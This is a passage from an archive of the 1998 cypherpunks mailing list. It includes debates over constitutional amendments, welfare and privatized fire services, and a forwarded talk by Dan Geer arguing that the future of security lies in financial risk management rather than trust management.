*Horus the manifesting Son of God = Jesus the manifesting Son of God

* The trinity of Atum the Father, Horus the Son, and Ra the Holy Spirit =
The trinity of the Father, Son and Holy Spirit.

*The first Horus as child of the Virgin, the second as Son of Ra = Jesus as
the Virgin's child, the Christ as Son of the Father.

*Horus the sower and Set the destroyer in the harvestfield = Jesus the
sower of the good seed and Satan the sower of tares.

*Horus carried of by Set to the summit of Mount Hetep = Jesus spirited away
by Satan into an exceedingly high mountain

*Set and Horus contending on the Mount = Jesus and Satan contending on the
Mount.

*Horus as Iu-em-Hetep, the child teacher in the temple = The child Jesus as
teacher in the Temple

* The mummy bandage that was woven without seam = The vesture of the Christ
without a seam.

*Twelve followers of Horus as Har-Khutti = Twelve followers of Jesus as the
twelve disciples.

        -Excerpt from Churchwar's book "Of Religion", first published 1924.
Reprints are available from Health Research, Mokelumne Hills, CA 95245.
Churchware was a student of the British poet and Egyptologist Gerald Massey. -

-- end pasted text--

In conclusion, GO AWAY.

Reeza!


	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Wed, 11 Nov 1998 21:44:59 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
In-Reply-To: <3.0.5.32.19981111182325.00879d50@205.83.192.13>
Message-ID: <Pine.LNX.3.93.981111052345.5702A-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 11 Nov 1998, Reeza! wrote:

> Amendment I
> Congress shall make no law respecting an establishment of religion, or
> prohibiting the free exercise thereof; or abridging the freedom of speech,
> or of the press; or the right of the people peaceably to assemble, and to
> petition the Government for a redress of grievances.
> 
> Amendment II
> A well regulated Militia, being necessary to the security of a free State,
> the right of the people to keep and bear Arms, shall not be infringed. 
> 
> --end pasted text--
> 
> While the 2nd does say "well regulated", it should also be pointed out that
> the 1st does not say "right OF THE PEOPLE", except in the freedom of
> assembly clause.

And notice also that the 1st begins with "Congress shall make no law" while
the 2nd begins with "a well regulated militia".

> >(And yes I know I'm asking for a shitstorm of trouble saying that on THIS
> >list of all places).
> 
> So why did you?

Becos the attempted paraody was lame in the same ways that all attempts to
nonrationally support 2nd amendment freedoms by calling down the gods of 1st
amendment freeomds always are nonrational. (And no, that's not me saying
supporting 2nd amendment freedoms is irrational; it's me saying using the
1st amendment to do so is irrational).


- b!X (Guerrilla Techno-fetishist @ GEEK Force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Wed, 11 Nov 1998 21:46:37 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
In-Reply-To: <199811110331.VAA22384@einstein.ssz.com>
Message-ID: <Pine.LNX.3.93.981111052740.5702B-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 10 Nov 1998, Jim Choate wrote:

> > Yeah yeah all very well and good parody except that the 2nd amendment
> > contains the word "well-regulated" and the 1st doesn't. 
> > 
> > (And yes I know I'm asking for a shitstorm of trouble saying that on THIS
> > list of all places).
> 
>  
> 				ARTICLE I. 
> 	Congress shall make no law respecting an establishment of religion, 
> or prohibiting the free exercise thereof; or abridging the freedom of 
> speech, or of the press; or the right of the people peaceably to assemble, 
> and to petition the Government for a redress of grievances. 
>  
> 				ARTICLE II. 
> 	A well regulated Militia, being necessary to the security of a 
> free State, the right of the people to keep and bear arms, shall not be 
> infringed. 
>  
> 
> I'd say that 'shall make no law' is a clear as 'shall not be infringed' and
> pretty equivalent in meaning.

Same comments as before. Utiizing the text of the 1st to defend one's
approach to the 2nd is nonrational, which is what the lame parody attempted
to do, and what I was criticizing.


- b!X (Guerrilla Techno-fetishist @ GEEK Force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 11 Nov 1998 14:18:11 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect  Foregone)(fwd)
In-Reply-To: <199811100027.AAA07402@server.eternity.org>
Message-ID: <199811110544.GAA28375@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> wrote:

> What is annoying is "charity" (social security) at the point of a gun.
> Our "conscience" is being decided by government which is acting as a
> broker for those lobby for their "need" and for your assets to be
> stolen and redistributed to them.
> 
> What people aren't willing to pay for shouldn't happen.  Period.  If
> that means people starve well those complaining loudest had better
> dig deeper into their pockets.

Imagine one of your kids had an accident and needed more expensive care
than you can pay for. Would you accept government "charity"?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 21:51:06 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
Message-ID: <199811111333.HAA23673@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 05:27:11 -0800 (PST)
> From: b!X <bix@geekforce.org>
> Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed

> And notice also that the 1st begins with "Congress shall make no law" while
> the 2nd begins with "a well regulated militia".

> Becos the attempted paraody was lame in the same ways that all attempts to

Hey, can I use that spelling of 'because'? I want to irritate a particular
wanna-be-english-teacher subsribed to the CDR...;)

> nonrationally support 2nd amendment freedoms by calling down the gods of 1st
> amendment freeomds always are nonrational. (And no, that's not me saying
> supporting 2nd amendment freedoms is irrational; it's me saying using the
> 1st amendment to do so is irrational).

Yep, you have to use the 9th and 10th as well. In for a penny end for a
pound.
 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
  
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 21:55:28 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
Message-ID: <199811111335.HAA23736@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 05:30:22 -0800 (PST)
> From: b!X <bix@geekforce.org>
> Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)

> > I'd say that 'shall make no law' is a clear as 'shall not be infringed' and
> > pretty equivalent in meaning.
> 
> Same comments as before. Utiizing the text of the 1st to defend one's
> approach to the 2nd is nonrational, which is what the lame parody attempted
> to do, and what I was criticizing.

I'm not using the 1st to justify the second, all I'm saying is the two
related phrases are equivalent within the context of the Constitution. It's
semantics.

Or are you saying that if you go slow enough it's as good as a stop? How
slow is slow enough?


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 22:21:55 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Question about insurance managed fire services... (fwd)
Message-ID: <199811111402.IAA24089@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 14:50:12 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Re: Question about insurance managed fire services...

> Jim Choate writes:
> > 
> > How does company A guarantee that company B won't begin to burn down the
> > customers of company A so that the economic impact on A is sufficient they
> > can't participate in the market?
> 
> How does it do so now?

Insurance regulatory agencies who monitor the behavior, investigation by a
reasonably impartial fire dept after every fire. That's at least two.

> Fucking idiot. Do you imagine that the customers of company A (and
> their police, security force or other guardian) will stand idly by
> while their homes (the implied target) are burned?

What police and security forces? You mean the ones the same insurance
company co-oped?

What makes you thing that Company A or B will even advertise their actions?

Who says the homes will be burned when the residents are even home? It isn't
like anyone is going to ask their permission.

And I'm the 'fucking idiot'.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 11 Nov 1998 22:33:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: DCSB: Risk Management is Where the Money Is; Trust in DigitalCommerce
Message-ID: <v04020a3bb26f3ed26da2@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: dcsb@ai.mit.edu
Subject: Re: DCSB: Risk Management is Where the Money Is; Trust in Digital
Commerce
Date: Tue, 10 Nov 1998 23:40:49 -0500
From: Dan Geer <geer@world.std.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Dan Geer <geer@world.std.com>


<per several requests>


-----------------8<----------------cut-here----------------8<-----------------



Nominal delivery draft

-------------------------------------
Risk Management is Where the Money Is
-------------------------------------

Digital Commerce Society of Boston
3 November 98

Daniel E. Geer, Jr., Sc.D.
Senior Strategist, CertCo, Inc.
55 Broad Street, NYC, and
100 Cambridgepark Drive, Cambridge
geer@certco.com


Given my biases, I am going to describe where the future of the
security marketplace is and where it is not. I will argue that the
financial community is and remains the place to look for "first light"
for new security technology. I will give you a rundown of what's new
while I predict what little time is left for many of today's products,
purveyors and regulators. I will argue that, in many ways, the party's
over for the security field as we know it now. I will range broadly
because security, as a concept, is universal.

"Nothing is so powerful as an idea whose time has come."  For security
technology, that time is now. IBM calls the three requirements of the
"e-business" future as: #1 security, #2 scalability, and #3
integration. Forrester, Gartner, META, Yankee and all the other
analysts agree -- the most important enabling technology for electronic
business, besides network connectivity itself, is security. AD Little
estimates that security, privacy and the legal issues of digital
signature together constitute over half of the quantifiable barriers to
electronic commerce. There are whole venture funds whose investment
focus is around security.  Security startups are everywhere; so are
security books. The word "security" is hardly rare in employment
advertisements.  You cannot walk a trade show and not see the word
"security" in screaming big type. The number of security meetings is
preposterous.  Presidential Commissions are busy spending real money on
security for the information systems that run the country.

"In the future, everyone will each get 15 minutes of fame." That
applies to security,too.  Today's security specialty companies cannot
all survive; they can be eclipsed by the platform vendors too easily.
Only platform vendors can deliver security that is integrated enough to
scale and invisible enough to ignore.  Even the Justice Department
knows that once something is in the operating system, any independent
market for it collapses. Yes, security's time may well have come, but
in a Warhol world, that would mean that it is about time to go.

The focus of "security" research today is the study of "trust
management" -- how trust is defined, created, annotated, propagated,
circumscribed, stored, exchanged, accounted for, recalled and
adjudicated in our electronic world.  This is natural because security
is a means and not an end.  This is mature because all technology
differentiates along cost-benefit lines.  All the security technology
that you can buy today enables some aspect of trust management and
novel variations show up daily.

You can walk out of this hall and buy systems that use passwords that
get local machines to trust you enough to let you in. You can buy smart
cards that can do your cryptographic calculations for you, respond to
challenges, hold your keys inviolable or, more interestingly, have
identities of their own and serve merely to introduce you on their own
terms. You can buy biometric devices that look at your voice, your
face, your retina, your fingerprint, or even the idiosyncrasies of how
you learned to type and so say, "Yep, that's the guy." You can get
systems that are sufficiently hardened that you can rely on them if for
no other reason they are so nearly useless no one would want to break
in. You can still get your hands on security systems in the raw and
roll your own directly from source-code.  You can, anywhere, anytime,
spin-up virtual private networks that are trustworthy protectors of
your confidentiality however hostile the intervening wires are. You can
even deliver privacy between strangers -- nearly a matter of creating
trust in order to propagate it. You can put a document into the
Eternity Service and trust that it can never be erased or you can put
it into a cryptographic file system and trust that it can never be
found.  Simple? Yes; academics and entrepreneurs alike are busy
supplying ways to propagate trust.

They have it all wrong.

If you ever took a course in probability then you know that many
problems are solved by calculating their dual -- the probability of
"not X" can be a whole lot more tractable than figuring Pr(X) directly.
If you're in a security-based startup company, then you'll know that
making money requires making excitement, even if the excitement is
somebody else's public humiliation. And all of you can agree that the
more important something is, the more it must be managed. Trust
management is surely exciting, but like most exciting ideas it is
unimportant. What is important is risk management, the sister, the dual
of trust management. And because risk management makes money, it drives
the security world from here on out.

Every financial firm of any substance has a formal Risk Management
Department that consumes a lion's share of the corporate IT budget.
The financial world in its entirety is about packaging risk so that it
can be bought and sold, i.e., so that risk can be securitized and
finely enough graded to be managed at a profit. Everything from the
lowly car loan to the most exotic derivative security is a risk-reward
tradeoff. Don't for a minute underestimate the amount of money to be
made on Wall Street, London and/or Tokyo when you can invent a new way
to package risk. The impact of Moore's Law on the financial world is
inestimable -- computing has made that world rich because it has
enabled risk packaging to grow ever more precise, ever more real-time,
ever more differentiated, ever more manageable. You don't have to
understand forward swaptions, collateralized mortgage obligations,
yield burning, or anything else to understand that risk management is
where the money is. In a capitalist world, if something is where the
money is, that something rules.  Risk is that something.

Security technology has heretofore been about moving trust around as if
risk is definitionally undesirable and reliable trust management simply
obviates the issue of risk.  It does not come close. In two years time
the "trust-hauling" market will be somewhere on the down-slope between
legacy and dead.  Risk management is going to take over as the dominant
paradigm because risk management can subsume trust, but trust
management cannot subsume risk. The Internet has made this so.

The Internet is irresistible because it lowers barriers to entry on a
global basis -- global in both space and time.  Ever more important
parts of the world's economy exist only in cyberspace, and lead times
have entirely collapsed.  Every professional fortune teller is bidding
geometric increases in the dollar volume of electronic commercial
activity. But when there is enough booty available, even absurdly
difficult attacks become plausible. This is the world we are in. It
will never be possible to really do the job of trust management any
more than it is possible to really win an arms race or really preclude
your car from being stolen. But risk management -- that is doable and
it is doable at a profit. The proof is all around us.

We are a score of years down this road. 1978 was a vintage security
year; the remarkable papers by Rivest, Shamir & Adleman and Needham &
Schroeder were published, both in CACM as it happens. The former
introduced public key ideas and the latter created Kerberos. The
counterpoint between these two technologies is instructive. Both
symmetric cryptosystems, like Kerberos, and asymmetric cryptosystems,
like RSA, do the same thing -- that is to say they do key distribution
-- but the semantics are quite different. The fundamental
security-enabling activity of a secret key system is to issue fresh
keys at low latency and on demand. The fundamental security-enabling
activity of an asymmetric key system is to verify the as-yet-unrevoked
status of a key already in circulation, again with low latency and on
demand. This is key management and it is a systems cost; a secret key
system like Kerberos has incurred nearly all its costs by the moment of
key issuance. By contrast, a public key system incurs nearly all its
costs with respect to key revocation.  Hence, a rule of thumb: The cost
of key issuance plus the cost of key revocation is a constant, just yet
another version of "You can pay me now or you can pay me later."

Because of the tradeoffs between who pays for what part of the systems
cost and who gets the benefit, secret key systems and public key
systems have different fields of use. Secret key systems are fast and
offer revocation at no marginal cost. Public key systems are slow but
they enable digital signature and thus enable proof of action,
non-repudiation as it is called. Secret key systems are the default
choice within an organization while public key systems are the default
choice between organizations, i.e., secret key for where security is an
intramural concern intramurally arbitrated, and public key for where
security is extramural thereby requiring recourse to a third party
judge in cases of dispute. The relentless blurring of what is
intramural and what is extramural will favor public key over time.

Because a trust management paradigm says that a digital signature is
only as valid as the key (in which it was signed) was at the moment of
signature, it is only as good as the procedural perfection of the
certificate issuer and the timely transmission of any subsequent
revocation. **These are high costs.** In fact, the true costs of
general public key infrastructure are so extraordinarily high that only
our collective ignorance of those costs permits us to propel ourselves
toward a general PKI as if it were a panacea.  When, not if, the user
community at large realizes this, we "security people" will have but
two choices, compromise on (gloss over) the quality of trust that
public key can deliver or back off from the claims of full trust cheap.
In other words, we'll have to fit the benefit to the endurable cost or
fit the cost to the requisite benefit.  Since, as a rule of thumb, to
halve the probability of loss you have to at least double the cost of
countermeasures, any finite tolerance of cost means an upper bound on
how much security you can get. In the fullness of time, security
technology will be evaluated on the same cost-benefit-risk tradeoff on
which other technologies are evaluated. This is the price of maturity;
this is the price not yet paid.

Do not misunderstand me; public key technology, secret key technology,
security technology in general are daily reaching new levels of
protective capability. What they cannot protect against is being
over-sold, and they are being over-sold. Why is that?

The days when the Internet was a toy are gone even if a high percentage
of its new investors are still coming in merely to avoid looking dowdy.
The real question on the table is: When does the Internet become more
like the data center. And what does making the Internet more like the
data center mean? At a minimum, it means metered use.  Discussions are
already widespread about requiring Internet postage; large ISPs will
probably demand it, existing postal services would love to sell it and
data centers, such as the financial giants, will get a better handle on
what goes in and out the door. At least one Wall Street bank already
does charge-back for network bandwidth consumption and their internal
electronic security regime plays a role in assigning those costs just
as, in turn, their security group manages the user database via
incremental updates rather than fresh full copies so as to minimize
their bandwidth charges. That's not postage, but it is close and it is
now.

Incremental use charges are but one example, interesting mostly because
they are a near term step toward making the Internet into a data
center. The fundamental value of the data center is the information it
holds. The past few years have seen data warehousing, data mining and
now connection of the data center to the Web, data publishing if you
will. MVS, for example, has a really good web server and someone in the
audience will have to convince me that there is a difference between a
1970's central time-share machine and an MVS web server in a swarm of
"thin clients" on fast networks. It certainly isn't the direct wire
connection -- SSL simulates that well enough. It surely isn't the
management model; the MIS director who had declared defeat in desktop
configuration management will, you can be sure, rejoice at getting
control back.

In the mainframe world, you move the computation to where the data is.
In a client server world, you move the data to where the computation
is. Web servers front-ending corporate databases attached to virtual
private networks full of some universal client like a web browser sure
sounds like a resurgence of the data center to me. The IBM 390 is a
good machine and the Wintel cartel has pretty much ensured that no
upstart will enter their space. From Wintel's point of view, using all
those desktop cycles for display functions is just fine. Could it be
that simple?

Financial markets made SUN what it is today and vice versa -- SUN's
first big win, the first big demonstration that computing power had
risen to such a degree that moving the data to where the computing is
made sense, "the network is the computer" and all that. Financial
markets, in the sense of traders going head to head, used that power to
replace whom you knew with what you know and set off a
technology-as-weapon metaphor that has overtaken most of the business
world. Financial Markets, in the sense of Exchanges, now rely on a
dense spread of computing that exceeds what most of us have to deal
with; more than one major bank has 15,000 FTP jobs a night just moving
data to or from its data center. Plenty of staff at the NYSE lose $1000
apiece for every 15 minutes the Exchange is late opening due to IT
unavailability. No computing equipment is too expensive when trumped
with "I can make that back on the first trade." No small country runs
its currency anymore.

There was once no question that the fundamental purpose of an exchange
was to provide "an advantage of time and place" to those who would
trade on it and, in so doing, establish efficiency and liquidity
baselines against which others would be judged.  Beginning first with
the "Paperwork Crisis" in the 60's and reaching a crescendo after the
"Crash of '87," the Exchanges have been fully committed to electronic
commerce before that phrase meant anything.  But since the Internet,
time and place are meaningless and the Exchanges know it. They are
working hard to make oversight, fair play and quality of service into
new baselines. Clearly, security technology is #1 in their list of
requirements followed closely by scalability and integration.

Security in a financial world market that is both nowhere and
everywhere is a difficult thing to define well enough to solve, but if
there is anything to engineering as a discipline then it is that the
heavy work is in getting the problem statement right. So, to return to
my central premise, if new security technology is a result of
investment and if the investment in security technology is naturally
centered within the financial community, what is the problem statement?
** If we get that right, we can predict the future. **

I submit that the problem statement is how to bring a transactional
semantic to the Internet. This is not a new problem, but it is an as
yet unsolved one. The existing financial markets want transactions
because transactions are what they are about and transactions are what
they know. Upstarts like the payment vendors want to be the first to
deliver transactions and disintermediate the financial firms.
Technical legal beagles reason that there is no transaction without
recourse, no recourse without contract, no contract without
non-repudiation and no non-repudiation without digital signature.
Anyone who wants to do business on the Web needs transactions.

Hal Varian, an economist and Dean of the Information Management School
at Berkeley, taught me that what the Internet changes more than
anything else is that it brings the efficiency of auction to markets
that never had that option.  This is a cover story in this week's "The
Industry Standard." Auctions need security technology because what
makes an auction an auction is the ability to conclude a transaction
which, by its own execution, "discovers" a price. In other words, the
nature of the world's economy is changed by the existence of the
Internet, but only on the condition that electronic transactions are up
to job.

So what do I mean by "transaction?" I mean a non-repudiable
communication between two parties who can each verify the time-, value-
and content-integrity of that communication, who can presume
confidentiality of that communication, who can verify the authenticity
and authorization of their counterparty and who can present all these
evidences to third party adjudication should there be a need for
recourse at any arbitrary time in the future. **Every single part of
that definition begs the question of security mechanism.**  It is on
that basis I claim that the security technology of tomorrow will be
crafted in response to the unmet needs of financial markets today.

As an example, your handwritten signature on a check is what, in
principle, authorizes that funds move from A to B. In truth, from a
bank's point of view, actually verifying handwritten signatures is a
transaction cost that is not worth bearing unless the cost of
verification is less than the risk of loss. At the largest banks, the
threshold dollar amount below which verification does not really happen
is a closely guarded number, but it generally exceeds $20,000 and still
they have platoons of people doing this all day, every day. Converting
the means of signature verification from a manual process into a
machine-able one would radically change the economics of check
processing. It would add billions to lines and do it from the
cost-avoidance side of the ledger.

But that is not all. Some $300B of U.S. payments are made every day of
which only $60B are in the form of checks; the balance is largely in
cash transactions of $5 or less. From both the merchant's and the
bank's perspectives, getting rid of cash would be a huge win because
handling costs for small dollar amounts often exceed the profit margins
on the underlying sales.  While the consumer may well adopt cashless
payment out of some sense of convenience, the financial side of the
house will enable it to avoid costs.

Only this morning, Frost & Sullivan released a study that defines
e-commerce as "commercial transactions taking place over the Internet
with exchange of value in real time."  Web payment sparked numerous
startups with numerous different mechanisms. It is too late for you to
enter this market, but it is not too late for those payment-systems
vendors to rethink what they are trying to do. All of them are
suffering because the volume of Web-based retail business has not
picked up as fast as their business plans had presumed. For the retail
customer, the main thing the Web offers is product discovery; a good
print catalog and an 800 number are otherwise hard to beat. It is clear
that the real money in Web commerce is in business-to-business
commerce, but there the supply chain has a lot more complication and
the kinds of security mechanisms need to be better than those for
buying a toaster oven.  Whereas retail commerce is about small dollar
amounts and stranger-to-stranger transactions through a financial
intermediary like a credit-card company, business-to-business is more
about relationships, the dollar value of the sale is much bigger, and
banks play a direct role (through letters of credit, collateralized
bills of lading, etc.)

B2B commerce does not have a good solution yet. If you want to sell
into this market, be aware that the customer will buy either to avoid
costs he has now or to make revenue he doesn't have yet. In the case of
saving costs, you'll have to sell him the technology on a turnkey basis
-- he will not cut you into the transactional revenue stream. If you
can really show that your technology will make him revenue he did not
have a chance to make otherwise, you may be able to get a piece of the
revenue stream, but do not underestimate the cost-avoidance focus of
big buyers and sellers. As far out as 2005, over half the
Internet-transactions will be transactions converted from paper and
credit/debit cards, not new transactions. **When selling into a
cost-averse market you automate rather than revolutionize, and you do
not get a piece of the action.**

Everyone likes to talk about "disintermediating the banks," that is
making the intermediary role of banks in commerce less essential by
performing that service in some other way. Bill Gates is widely quoted
as saying that "Banks are dinosaurs." At the highest end, they are not
dinosaurs and they are not about to be disintermediated.  Whilst the
banks have a natural affection for their income streams, that doesn't
prevent disintermediation. Most wiseguys trying to disintermediate the
banks misunderstand what banks do. This is what they do: They interpose
their balance sheet between the expectations of the counterparties to a
transaction and the risk of default on either of their parts. They
undertake stop-loss protections against credit risk, insolvency,
operational failure, currency fluctuation, diversion of funds delivery,
etc. In other words, they manage risk because they can absorb loss.
**Electronic commerce payment technology cannot absorb loss, so it
cannot and will not disintermediate the banks.**

Think of this this way: All public key technology is driven to make a
digital signature verifiable, i.e., it is about quality control and
guarantee on the signature itself. This is a stunning thing, but it is
not the whole equation. The intermediation role that banks play is to
guarantee the transaction, i.e., it is broader than just the
verification of a signature. The bank's know-how and its balance sheet
are not something that can be replaced by a cryptographic calculation.
The ability to avoid loss never makes up for the ability to absorb
loss.  The cryptography guarantees the signature; the bank's capital
guarantees the transaction. **Risk control encapsulates trust.**

In the midst of this, you might say "What are the standards?" in the
sense of "What do the formal standards groups have to say?" The banking
world is regulation rich and standards rich, too, which begs the
question -- "Which standards matter?" The world of the Internet is
making some of the banking-centric standards passe' but, unlike the
combination of standards and regulations the banks are familiar with,
the standards groups of the Internet cannot take on accountability for
the implications of conformance/non-conformance though they continue to
define it for others. This makes Internet standards substantially
difficult to swallow because there is no accountability, nor can there
be. The absence of enforcement guarantees that the only Internet
standards that will really get attention are those that promote
interoperability across jurisdictional boundaries. Ironically, this is
all the pioneers of the Internet ever wanted.

What the banks want, and I assure you they will get, is a set of
cryptographically sophisticated tools that move the risks of the
Internet from open-ended to estimable. In a sense, this is like
insurability. It is probably apocryphal, but the story goes that a
major investment firm with a Web commerce idea went to a big insurance
company to seek stop loss protection. The conversation supposedly went
like this:

   "How big is the potential loss?"
   "We don't know."
   "How likely is a loss to occur?"
   "We don't know."
   "How much is your company worth?"
   "This much."
   "That's the premium; send it in."

Whether true or not, it illustrates the point -- the issue is getting a
handle on the risk such that it can be priced.  Every one of you who
has tried to sell security technology has discovered that the only
willing customers are those who either (1) have just been embarrassed
in public or (2) have just learned that they are facing an audit.
Everyone else is an unwilling customer.  We've been dumb about this;
we've tried to sell security as a means to establish trust but we've
done it by railing about threats. It's no damned wonder that we haven't
sold much. I know I have often wondered if my market might not explode
were I to get just one of the big loss-prevention insurers to make good
security practices and technology into an underwriting standard.  Then,
just like "Do you have sprinklers?" everyone is forced to confront
whether they want to pay for security or pay for non-security. I am
confident that the insurers could soften up my targets a lot better
than I can.

Let me tell you, they are about to. Insurability of Web commerce is
essential, and no insurer is going to accept "We don't know" as an
answer. They will say "Send it all in" and they'll mean it. The demand
side for security technology is exploding but it isn't quite the
security technology we have on hand.

If a digital signature has the uniquely irreplaceable property of
providing proof to a judge, then the role of a "trusted third party" is
going to become more important over time, not less.  Think of it this
way: when I get a certificate issued to me by a certifying authority, I
do have some risk around whether the CA is well operated or not. This
includes the probability they will issue a certificate with my public
key but someone else's name and whether when I tell them that my key
has been compromised they will spring into decisive action. Most of
that risk I can handle by a combination of due diligence and contract.

However, when I give my certificate to you and say "Hi, I'm here from
Central Services to fix your system" it is you that's in a risky
position. You have to say "Is this certificate valid?" That means you
have to check that the certificate is not listed as revoked, that the
signature on the certificate is well formed, that the certificate
authority which issued this certificate itself has an identity
certificate that is itself validly signed, that the certificate
authority is itself not in any trouble with revocation, and and so
forth, ** recursively. **

The full cost of revocation testing is proportional to the square of
the depth of the issuance hierarchy.  In other words, this exceeds the
intellectual capacity of most certificate recipients. This means that
most recipients cannot themselves rely on the security technology to
establish trust beyond the shadow of doubt. Instead, if recipients are
smart, they will turn again to the insurance world just as risk holders
have done whenever they cannot afford to carry on their books the
consequences of a remotely unlikely event. For the insurer, he will
underwrite a guarantee on the transaction for a fee that will reflect
his experience with the CA's practices, the kind of transaction
undertaken, the dollar amounts involved, etc.  This will seem sensible
to all parties because it is so familiar.  This is risk management
underwritten by financial intermediaries.  This is where we will
shortly be.  This is the card eight major banks and CertCo played ten
days ago -- the formation of "a global network of compliant businesses
that use a common risk management framework." **This is where we
securitize the transactional risk of electronic commerce.**

There is one potential fly in this ointment, and I do not intend to
dwell on it, but I cannot get this far and not mention the threat to
strong security apparati of having them undermined by key escrow.
Corporate policies and laws alike have always been defined in a
territorial way that relies on clearly identifiable borders, physical
locations where the policy or the law come to an end. But in the
electronic world borders are meaningless. In some sense, sovereignty,
based as it was on the idea of a border, is less meaningful now than
for some centuries. In its place is a different kind of sovereignty,
because the only borders in an electronic world are cryptographic ones.
As such, the debate over who may or may not have a key known only to
themselves is a proxy discussion for who may or may not have
sovereignty within a cryptographically defined space.

There are hard questions yet to answer. Compromised keys are revoked
effective not to the moment of suspicion of compromise but rather
retroactively to the last known time when the key was safe. In the case
of escrow, should not a key's owner retroactively revoke it to the
moment of its seizure from escrow should the owner later discover that
it has been so seized? Or if a revoked key is only revoked by the
action of the certifying authority signing a revocation notice in a
special key, can that revocation-signing key itself ever be revoked? If
it could, would that not invalidate (reverse) any revocations signed in
it and what does that mean? I only offer these so that you do not
equate my argument about the near-inevitability of investment in public
key technology and digital-signature-dependent activities with some
presumed infallibility of the technology or our understanding of it.
These questions will be settled one way or another, but they remain
open as we speak here today, and there is money to be made.

I have tried to lay out my estimation on which way the tide is running
and which moon's gravity matters. I could be completely wrong, or
merely overstating what my biases bring me, but I think not. I think
that just as the best estimate of tomorrow's weather is today's, the
best estimate of how the Internet and the financial behemoths will
interact is for the Internet to be driven, as a side effect, by the
cost-reduction and profit-incented strategies of those financial
behemoths.  They already transcend national boundaries and their
investment decisions do run the world.  Were this to get enough
investment, it might make security a solved problem at least as I
define "solved" to mean "consistent with risk management in the
insurance style." Since that would collapse the market for novel
security add-ons, I strongly suggest that as you prepare your business
plans you figure out how to be, as Tom Lehrer would say, a doctor
specializing in diseases of the rich.

This is a very exciting time and it is a privilege to be a part of it.
When we are all relics in rocking chairs, we will still know that we
were present at the creation. I know that I will count myself
particularly lucky, including for your close attention these past few
minutes.

Thank you for the honor of speaking with you.


END



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 11 Nov 1998 21:44:25 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
